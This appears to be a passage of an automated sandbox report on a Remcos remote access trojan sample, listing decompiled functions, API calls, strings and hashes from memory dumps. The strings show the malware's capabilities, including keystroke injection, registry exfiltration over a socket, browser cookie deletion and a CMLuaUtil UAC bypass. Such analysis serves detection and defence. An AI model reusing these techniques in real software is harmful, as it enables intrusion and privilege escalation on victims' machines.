                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                            • String ID: .part
                            • API String ID: 1303771098-3499674018
                            • Opcode ID: f8f352d1944775a3033a6e3b226fb99e3d0dc97036554631b9c7d83676d303e1
                            • Instruction ID: fa021c15c5d1e87e569c09a19ead990ccf19330fc060556597d24b4305e87d8f
                            • Opcode Fuzzy Hash: f8f352d1944775a3033a6e3b226fb99e3d0dc97036554631b9c7d83676d303e1
                            • Instruction Fuzzy Hash: 3A31B571508345AFC310EB61D84599FB3A8FF94359F00493FB945A21D2EB78EE08CB9A
                            APIs
                            • AllocConsole.KERNEL32 ref: 0041CE35
                            • GetConsoleWindow.KERNEL32 ref: 0041CE3B
                            • ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
                            • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Console$Window$AllocOutputShow
                            • String ID: Remcos v$5.1.1 Pro$CONOUT$
                            • API String ID: 4067487056-3820604032
                            • Opcode ID: bb520a2f19826cc6a1c283625bbcfbf44085728638f029a4a140c4eec348b460
                            • Instruction ID: 6efa3de70d430de9448838496adf33c47162c0890a3ad1875f095e209401f165
                            • Opcode Fuzzy Hash: bb520a2f19826cc6a1c283625bbcfbf44085728638f029a4a140c4eec348b460
                            • Instruction Fuzzy Hash: A90144B1A80304BBD610F7F19C8BF9E77AC9B14B05F500527BA04A70D2EB6DD944466E
                            APIs
                            • SendInput.USER32 ref: 00419A25
                            • SendInput.USER32(00000001,?,0000001C), ref: 00419A4D
                            • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A74
                            • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A92
                            • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AB2
                            • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AD7
                            • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AF9
                            • SendInput.USER32(00000001,00000000,0000001C), ref: 00419B1C
                              • Part of subcall function 004199CE: MapVirtualKeyA.USER32 ref: 004199D4
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: InputSend$Virtual
                            • String ID:
                            • API String ID: 1167301434-0
                            • Opcode ID: fc4380392ba50379eb6d472fb1d17d58296046c22f58e77cb3b57b5de18c14a3
                            • Instruction ID: b6cba15de7ba168fc32b54cb564de1fb898aed6d56f2455a0f9f7e0387a20004
                            • Opcode Fuzzy Hash: fc4380392ba50379eb6d472fb1d17d58296046c22f58e77cb3b57b5de18c14a3
                            • Instruction Fuzzy Hash: 2431AE71218349A9E220DFA5DC41BDFBBECAF89B44F04080FF58457291CAA49D8C876B
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: __freea$__alloca_probe_16_free
                            • String ID: a/p$am/pm$h{D
                            • API String ID: 2936374016-2303565833
                            • Opcode ID: fd6751c856b69d551333f65899c140b2c90fb7d01a30c867c2f4d7dd71cdc8bb
                            • Instruction ID: c225e1f32c331ede1d29eb10815d0f52c76e58365e66366979e06629ded2ae5c
                            • Opcode Fuzzy Hash: fd6751c856b69d551333f65899c140b2c90fb7d01a30c867c2f4d7dd71cdc8bb
                            • Instruction Fuzzy Hash: 94D1E1719082068AFB299F68C845ABFB7B1EF05300F28455BE501AB351D73D9E43CBA9
                            APIs
                              • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                            • _free.LIBCMT ref: 00444E87
                            • _free.LIBCMT ref: 00444E9E
                            • _free.LIBCMT ref: 00444EBD
                            • _free.LIBCMT ref: 00444ED8
                            • _free.LIBCMT ref: 00444EEF
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: _free$AllocateHeap
                            • String ID: KED
                            • API String ID: 3033488037-2133951994
                            • Opcode ID: bf8f09c86d4ddf62a61791e98d41f8d125843f3e4b01e4d539fef815b17f4b11
                            • Instruction ID: 6eb5fd97c930506827bd935ec23fdf2bd7e2f8155051dcdfd38a61b70e77380a
                            • Opcode Fuzzy Hash: bf8f09c86d4ddf62a61791e98d41f8d125843f3e4b01e4d539fef815b17f4b11
                            • Instruction Fuzzy Hash: 2351B371A00604ABEB20DF29CC42B6B77F4FF89724B25456EE809D7751E739E901CB98
                            APIs
                            • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413AF7
                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00413B26
                            • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710), ref: 00413BC6
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Enum$InfoQueryValue
                            • String ID: [regsplt]$xUG$TG
                            • API String ID: 3554306468-1165877943
                            • Opcode ID: 4b0e642b2c48494caa08e7f7a3ba59522f0f548a4503128eeb0998b2f931d829
                            • Instruction ID: 25111a67c66830bda9a991cbd11294aa9b1843c944dfd5f4caafe5fa1545c2ae
                            • Opcode Fuzzy Hash: 4b0e642b2c48494caa08e7f7a3ba59522f0f548a4503128eeb0998b2f931d829
                            • Instruction Fuzzy Hash: 05512D71900219AADB11EB95DC86EEEB77DAF04305F10007AE505B6191EF746B48CBA9
                            APIs
                            • GetConsoleCP.KERNEL32 ref: 100094D4
                            • __fassign.LIBCMT ref: 1000954F
                            • __fassign.LIBCMT ref: 1000956A
                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 10009590
                            • WriteFile.KERNEL32(?,?,00000000,10009C07,00000000), ref: 100095AF
                            • WriteFile.KERNEL32(?,?,00000001,10009C07,00000000), ref: 100095E8
                            Memory Dump Source
                            • Source File: 00000008.00000002.875960236.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000008.00000002.875951516.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.875960236.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                            Similarity
                            • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                            • String ID:
                            • API String ID: 1324828854-0
                            • Opcode ID: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                            • Instruction ID: 7b1e32e7ca62d622bc6abd4954a79b3a1191cf35157f5551c2bc05612337e78d
                            • Opcode Fuzzy Hash: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                            • Instruction Fuzzy Hash: D7519271D00249AFEB10CFA4CC95BDEBBF8EF09350F15811AE955E7295D731AA41CB60
                            APIs
                            • GetConsoleCP.KERNEL32 ref: 0044B47E
                            • __fassign.LIBCMT ref: 0044B4F9
                            • __fassign.LIBCMT ref: 0044B514
                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B53A
                            • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BBB1,00000000), ref: 0044B559
                            • WriteFile.KERNEL32(?,?,00000001,0044BBB1,00000000), ref: 0044B592
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                            • String ID:
                            • API String ID: 1324828854-0
                            • Opcode ID: 311db8d3e4a1a0a231de64f74e89b34bd80b314b172ec9a4a2cdea1eea97895d
                            • Instruction ID: 262f0c9efa3d8d05c94b564727faad167cb6e35c827a04fe4b8fb241bd644287
                            • Opcode Fuzzy Hash: 311db8d3e4a1a0a231de64f74e89b34bd80b314b172ec9a4a2cdea1eea97895d
                            • Instruction Fuzzy Hash: 2151B470A00249AFDB10CFA8D845AEEFBF8EF09304F14456BE955E7291E734D941CBA9
                            APIs
                            • RegOpenKeyExW.ADVAPI32 ref: 00413D81
                              • Part of subcall function 00413A90: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413AF7
                              • Part of subcall function 00413A90: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00413B26
                              • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                            • RegCloseKey.ADVAPI32(00000000), ref: 00413EEF
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseEnumInfoOpenQuerysend
                            • String ID: xUG$NG$NG$TG
                            • API String ID: 3114080316-2811732169
                            • Opcode ID: 45ce03b6782cd753b7e5a82f0aafb309821f1a3d97b9e276ee7b54a3a4dbf0fc
                            • Instruction ID: 39136fa66a1b3d14a29046baa0c8a2124f92290552efa608aac098e6c3039c27
                            • Opcode Fuzzy Hash: 45ce03b6782cd753b7e5a82f0aafb309821f1a3d97b9e276ee7b54a3a4dbf0fc
                            • Instruction Fuzzy Hash: 03419F316042005AC324F726D852AEF76A99FD1384F40883FF549671D2EF7C5949866E
                            APIs
                            • _ValidateLocalCookies.LIBCMT ref: 1000339B
                            • ___except_validate_context_record.LIBVCRUNTIME ref: 100033A3
                            • _ValidateLocalCookies.LIBCMT ref: 10003431
                            • __IsNonwritableInCurrentImage.LIBCMT ref: 1000345C
                            • _ValidateLocalCookies.LIBCMT ref: 100034B1
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.875960236.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000008.00000002.875951516.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.875960236.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                            Similarity
                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                            • String ID: csm
                            • API String ID: 1170836740-1018135373
                            • Opcode ID: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                            • Instruction ID: 0a936c430148d26a69835db3fa9f683d01d5328c1142e13f0191aacd949c771e
                            • Opcode Fuzzy Hash: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                            • Instruction Fuzzy Hash: D141D678E042189BEB12CF68C880A9FBBF9EF453A4F10C155E9159F25AD731FA01CB91
                            APIs
                              • Part of subcall function 00413656: RegOpenKeyExW.ADVAPI32 ref: 00413678
                              • Part of subcall function 00413656: RegQueryValueExW.ADVAPI32(?,0040F34E,00000000,00000000,?,00000400), ref: 00413697
                              • Part of subcall function 00413656: RegCloseKey.ADVAPI32(?), ref: 004136A0
                              • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                              • Part of subcall function 0041C048: IsWow64Process.KERNEL32(00000000,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C060
                            • _wcslen.LIBCMT ref: 0041B7F4
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process$CloseCurrentOpenQueryValueWow64_wcslen
                            • String ID: .exe$8SG$http\shell\open\command$program files (x86)\$program files\
                            • API String ID: 3286818993-122982132
                            • Opcode ID: 426cf9f555deb71152b4ea0aff0bdf5362cc4b7c5296926717e194012261492b
                            • Instruction ID: 00334f857bbe6022557327a28fa8f115e820bd32ca6b34e50ab8c41aa79dd428
                            • Opcode Fuzzy Hash: 426cf9f555deb71152b4ea0aff0bdf5362cc4b7c5296926717e194012261492b
                            • Instruction Fuzzy Hash: 42218872A001046BDB14BAB59CD6AFE766D9B48728F10043FF505B72C3EE3C9D49426D
                            APIs
                              • Part of subcall function 004135E1: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
                              • Part of subcall function 004135E1: RegQueryValueExA.KERNEL32 ref: 00413622
                              • Part of subcall function 004135E1: RegCloseKey.KERNEL32(?), ref: 0041362D
                            • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040BFA6
                            • PathFileExistsA.SHLWAPI(?), ref: 0040BFB3
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                            • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                            • API String ID: 1133728706-4073444585
                            • Opcode ID: c07787becfdd919c069db1a68e32e5c9d5958318cedaa5e6beefbf099ad8eae3
                            • Instruction ID: a06d8339010b4a31413dea3cf8b7af81beee50618fccc2c871009a62ab4f9f33
                            • Opcode Fuzzy Hash: c07787becfdd919c069db1a68e32e5c9d5958318cedaa5e6beefbf099ad8eae3
                            • Instruction Fuzzy Hash: BC215230A40219A6CB14F7F1CC969EE77299F50744F80017FE502B71D1EB7D6945C6DA
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 4464324db8c5353dfe5ce51150f621231adbafcb5ed67c6bb2f14fac2072150c
                            • Instruction ID: d4e598e7927038c57750db0ba161657e9615562456f8c919f0676739ef068bdb
                            • Opcode Fuzzy Hash: 4464324db8c5353dfe5ce51150f621231adbafcb5ed67c6bb2f14fac2072150c
                            • Instruction Fuzzy Hash: 931127B2504214BBEB216F768C05D1F7A5CEB86726B52062EFD55C7292DA3CCC0186A8
                            APIs
                            • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C4C1
                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041C4DE
                            • CloseHandle.KERNEL32(00000000), ref: 0041C4EA
                            • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C4FB
                            • CloseHandle.KERNEL32(00000000), ref: 0041C508
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$CloseHandle$CreatePointerWrite
                            • String ID: xpF
                            • API String ID: 1852769593-354647465
                            • Opcode ID: 03b5af7f289a82a83928ea742180afc1da621273c2f808e1c0dcbcf6c59c1bfa
                            • Instruction ID: 0233a984b642d2e84dd4fc2cab076f06cd7f632185dc4648213adf39284592b7
                            • Opcode Fuzzy Hash: 03b5af7f289a82a83928ea742180afc1da621273c2f808e1c0dcbcf6c59c1bfa
                            • Instruction Fuzzy Hash: 6311E571288215BFE7104A24ACC8EBB739CEB46365F10862BF912D22D0C624DC418639
                            APIs
                              • Part of subcall function 10009221: _free.LIBCMT ref: 1000924A
                            • _free.LIBCMT ref: 100092AB
                              • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                              • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                            • _free.LIBCMT ref: 100092B6
                            • _free.LIBCMT ref: 100092C1
                            • _free.LIBCMT ref: 10009315
                            • _free.LIBCMT ref: 10009320
                            • _free.LIBCMT ref: 1000932B
                            • _free.LIBCMT ref: 10009336
                            Memory Dump Source
                            • Source File: 00000008.00000002.875960236.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                            • Associated: 00000008.00000002.875951516.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.875960236.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                            Similarity
                            • API ID: _free$ErrorFreeHeapLast
                            • String ID:
                            • API String ID: 776569668-0
                            • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                            • Instruction ID: 62dea9ede071ec04ae7e8d39c2d2a9b8d59ba4565e42afa4a1a73bd13a3591d1
                            • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                            • Instruction Fuzzy Hash: 3E118E35548B08FAFA20EBB0EC47FCB7B9DEF04780F400824BA9DB6097DA25B5249751
                            APIs
                              • Part of subcall function 00450CC1: _free.LIBCMT ref: 00450CEA
                            • _free.LIBCMT ref: 00450FC8
                              • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                              • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                            • _free.LIBCMT ref: 00450FD3
                            • _free.LIBCMT ref: 00450FDE
                            • _free.LIBCMT ref: 00451032
                            • _free.LIBCMT ref: 0045103D
                            • _free.LIBCMT ref: 00451048
                            • _free.LIBCMT ref: 00451053
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: _free$ErrorFreeHeapLast
                            • String ID:
                            • API String ID: 776569668-0
                            • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                            • Instruction ID: 345e916fd15b447c36d88a7a8914fd19e4c3e0710e9d23c2e9f19f8556552687
                            • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                            • Instruction Fuzzy Hash: C111D231402704AAE621BB72CC03FCB779CAF03304F454D2EBEA967153C7ACB4185654
                            APIs
                            • std::_Lockit::_Lockit.LIBCPMT ref: 004111AB
                            • int.LIBCPMT ref: 004111BE
                              • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
                              • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
                            • std::_Facet_Register.LIBCPMT ref: 004111FE
                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00411207
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00411225
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                            • String ID: (mG
                            • API String ID: 2536120697-4059303827
                            • Opcode ID: 1b5c7adf1a629fe2bc242511ea8b9d41abd54e1fd7f2f3a966b13196985dc313
                            • Instruction ID: b4facbf35e110c19f3eede998f69f9310dce987b63f856d60fe44c7d5fb17b17
                            • Opcode Fuzzy Hash: 1b5c7adf1a629fe2bc242511ea8b9d41abd54e1fd7f2f3a966b13196985dc313
                            • Instruction Fuzzy Hash: 42112732900114A7CB14EB9AD8018DEB7699F44364F11456FF904F72E1DB789E45CBC8
                            APIs
                            • GetLastError.KERNEL32(?,?,0043A3D1,0043933E), ref: 0043A3E8
                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A3F6
                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A40F
                            • SetLastError.KERNEL32(00000000,?,0043A3D1,0043933E), ref: 0043A461
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLastValue___vcrt_
                            • String ID:
                            • API String ID: 3852720340-0
                            • Opcode ID: 786e665d26cf754d1d2cf441f113ccf6d654ddd054b4af6544b9cbcea7eecff9
                            • Instruction ID: 228fd8bb196f6ae1284969ba5442ea73dc67404c1df350b3d70410c0baad6fb0
                            • Opcode Fuzzy Hash: 786e665d26cf754d1d2cf441f113ccf6d654ddd054b4af6544b9cbcea7eecff9
                            • Instruction Fuzzy Hash: 87019C322483515EA61027797C8A62B2648EB293B9F30523FF518805F1EF984C90910D
                            APIs
                            • CoInitializeEx.OLE32(00000000,00000002), ref: 0040760B
                              • Part of subcall function 00407538: _wcslen.LIBCMT ref: 0040755C
                              • Part of subcall function 00407538: CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
                            • CoUninitialize.OLE32 ref: 00407664
                            Strings
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: InitializeObjectUninitialize_wcslen
                            • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                            • API String ID: 3851391207-1839356972
                            • Opcode ID: d877cea0863f9d3afa12868748af2f8600b5022738d517222c004e226c4c5a05
                            • Instruction ID: e4e7d1672fbddd81374e29e92f863be8f9bad83f72bb7a306ddb251afa86686e
                            • Opcode Fuzzy Hash: d877cea0863f9d3afa12868748af2f8600b5022738d517222c004e226c4c5a05
                            • Instruction Fuzzy Hash: 4501D272B087116BE2246B65DC4AF6B3748DB41B25F11053FF901A62C1EAB9FC0146AB
                            APIs
                            • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BB18
                            • GetLastError.KERNEL32 ref: 0040BB22
                            Strings
                            • [Chrome Cookies found, cleared!], xrefs: 0040BB48
                            • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAE3
                            • [Chrome Cookies not found], xrefs: 0040BB3C
                            • UserProfile, xrefs: 0040BAE8
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID: DeleteErrorFileLast
                            • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                            • API String ID: 2018770650-304995407
                            • Opcode ID: e57bb7af6ede7258cae938a4b9e303b9ad2d55d8c8bd3889b57b796562934694
                            • Instruction ID: 5dee569c6883bfd73109a670bb68234af0f28e4caad238985ba957b2c74b96e7
                            • Opcode Fuzzy Hash: e57bb7af6ede7258cae938a4b9e303b9ad2d55d8c8bd3889b57b796562934694
                            • Instruction Fuzzy Hash: 5B01DF71A402055BCA04B7B6CC1B9BE7B24E922704B50017FF502726D6FE3E5D0986CE
                            Strings
                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 004076FF
                            • `.S, xrefs: 004076DF
                            • Rmc-OT0ZCG, xrefs: 00407715
                            Memory Dump Source
                            • Source File: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000008.00000002.874879504.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                            • Associated: 00000008.00000002.874879504.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                            Yara matches
                            Similarity
                            • API ID:
